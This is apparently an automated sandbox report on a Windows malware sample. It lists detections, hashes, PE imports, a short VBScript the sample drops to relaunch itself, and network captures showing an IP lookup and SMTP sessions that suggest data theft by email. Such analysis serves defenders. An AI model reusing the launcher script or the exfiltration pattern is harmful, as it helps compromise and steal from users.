                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 63%
                          Reputation:low
                          Process:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):288
                          Entropy (8bit):3.408010872849407
                          Encrypted:false
                          SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1Mlxk/o0DdnriIM8lfQVn:DsO+vNloRKQ1MlCnFmA2n
                          MD5:1C2E37660FEE8AB5C54D47F2277FF747
                          SHA1:FA1B24A02C0C385BC217B2C9F7DDDB93AE065127
                          SHA-256:A41BBABDF59C5760E8D455EDD5BC8D29C3356D4FA1BA1E7958FEE5A6E12E33F9
                          SHA-512:22E12564CF89BEA90D11C2405A2566B26EC28D305F9E915710FCF6269983AD7A80E32829017E5B117D2C656C23D1B925ABA61748A32B079E4D52567DFF68E952
                          Malicious:true
                          Reputation:low
                          Preview:Set WshShell = CreateObject("WScript.Shell")
                          WshShell.Run "C:\Users\jones\AppData\Local\inhumate\incalculability.exe", 1
                          Set WshShell = Nothing
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.507505928988643
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:q6utlq83i0.exe
                          File size:1'301'411 bytes
                          MD5:2b2832a4e1bf4e26e59980f4162334e2
                          SHA1:a9ae9ed9b7804a21fc0cf1e6b0d7d2e9f18b8336
                          SHA256:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257
                          SHA512:26fc4677d42d3c0dae70a0f5c8c8e0987bac137d94d6973883de48c3de028424e77c2227d14b4d59b9eafe097a5e3dde29d275fbe1de3ce7fe880d4496228f01
                          SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCznZeX4CCmLFtyfHIHjw3Oz/ijaX:7JZoQrbTFZY1iaCznMCiFtygHcOTN
                          TLSH:D755E122B9C68036C2F323B19E7EF769963D69370336D29727C82D615E905816B39733
                          Icon Hash:1733312925935517
                          Entrypoint:0x4165c1
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                          Programming Language:
                          • [ C ] VS2010 SP1 build 40219
                          • [C++] VS2010 SP1 build 40219
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [ASM] VS2010 SP1 build 40219
                          • [RES] VS2010 SP1 build 40219
                          • [LNK] VS2010 SP1 build 40219
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                          RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                          RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                          RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
                          RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
                          RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
                          RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
                          RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
                          RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
                          RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
                          RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
                          RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
                          RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
                          RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
                          RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
                          RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
                          RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
                          RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                          RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
                          RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
                          RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
                          RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
                          RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
                          RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
                          RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
                          RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
                          RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                          DLL | Import
                          WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                          VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                          WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                          COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                          MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                          WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                          PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                          USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                          KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                          USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                          GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                          COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                          ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                          SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                          ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                          OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                          Language of compilation system | Country where language is spoken | Map
                          English | Great Britain |
                          English | United States |
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 8, 2024 14:44:21.777008057 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.778022051 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.783109903 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.940562010 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.945900917 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.951005936 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.109257936 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.109512091 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.114936113 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.272157907 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.272404909 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.277566910 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.458236933 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.458422899 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.463526964 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.618721008 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.640285969 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.640335083 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.640358925 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.640402079 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.645612001 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.645786047 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:23.020890951 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:23.073704958 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:38.162275076 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:38.372858047 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.372912884 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.373136997 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.376445055 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.376466036 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.864310026 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.864458084 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.865997076 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.866008997 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.866342068 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.917536020 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.917855024 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.963407040 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:39.470359087 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:39.470540047 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:39.470602036 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:39.476566076 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:39.988236904 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:39.993257999 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:39.993475914 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:40.797152996 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:40.797447920 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:40.802615881 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:40.966017008 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:40.970283031 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:40.975234985 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.134866953 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.135368109 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.140527010 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305514097 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305588007 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305624962 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305660009 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305676937 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.305700064 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305727005 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.307543993 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.312464952 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.472243071 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.479410887 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.484390020 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.644237041 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.645514011 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.650739908 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.811187029 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.811538935 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.816611052 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.006211042 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.006841898 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.012226105 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.174082994 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.174401045 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.180322886 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.362207890 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.362700939 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.367772102 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.527158976 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.527852058 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.527915001 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.527940989 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.527982950 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.532969952 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.533732891 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:43.148051977 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:43.148281097 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:43.148426056 CEST49739587192.168.2.4198.54.122.135
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 8, 2024 14:44:18.824395895 CEST | 61171 | 53 | 192.168.2.4 | 1.1.1.1
                          Oct 8, 2024 14:44:18.831677914 CEST | 53 | 61171 | 1.1.1.1 | 192.168.2.4
                          Oct 8, 2024 14:44:20.030275106 CEST | 60784 | 53 | 192.168.2.4 | 1.1.1.1
                          Oct 8, 2024 14:44:20.038211107 CEST | 53 | 60784 | 1.1.1.1 | 192.168.2.4
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Oct 8, 2024 14:44:18.824395895 CEST | 192.168.2.4 | 1.1.1.1 | 0xae75 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                          Oct 8, 2024 14:44:20.030275106 CEST | 192.168.2.4 | 1.1.1.1 | 0xd87c | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Oct 8, 2024 14:44:18.831677914 CEST | 1.1.1.1 | 192.168.2.4 | 0xae75 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                          Oct 8, 2024 14:44:18.831677914 CEST | 1.1.1.1 | 192.168.2.4 | 0xae75 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                          Oct 8, 2024 14:44:18.831677914 CEST | 1.1.1.1 | 192.168.2.4 | 0xae75 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                          Oct 8, 2024 14:44:20.038211107 CEST | 1.1.1.1 | 192.168.2.4 | 0xd87c | No error (0) | mail.privateemail.com | | 198.54.122.135 | A (IP address) | IN (0x0001) | false
                          • api.ipify.org
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49730 | 104.26.12.205 | 443 | 7376 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-08 12:44:19 UTC | 155 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                          Host: api.ipify.org
                          Connection: Keep-Alive
                          2024-10-08 12:44:19 UTC | 211 | IN | HTTP/1.1 200 OK
                          Date: Tue, 08 Oct 2024 12:44:19 GMT
                          Content-Type: text/plain
                          Content-Length: 11
                          Connection: close
                          Vary: Origin
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 8cf638bd88948cad-EWR
                          2024-10-08 12:44:19 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                          Data Ascii: 8.46.123.33


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49738 | 104.26.12.205 | 443 | 7880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Timestamp | Bytes transferred | Direction | Data
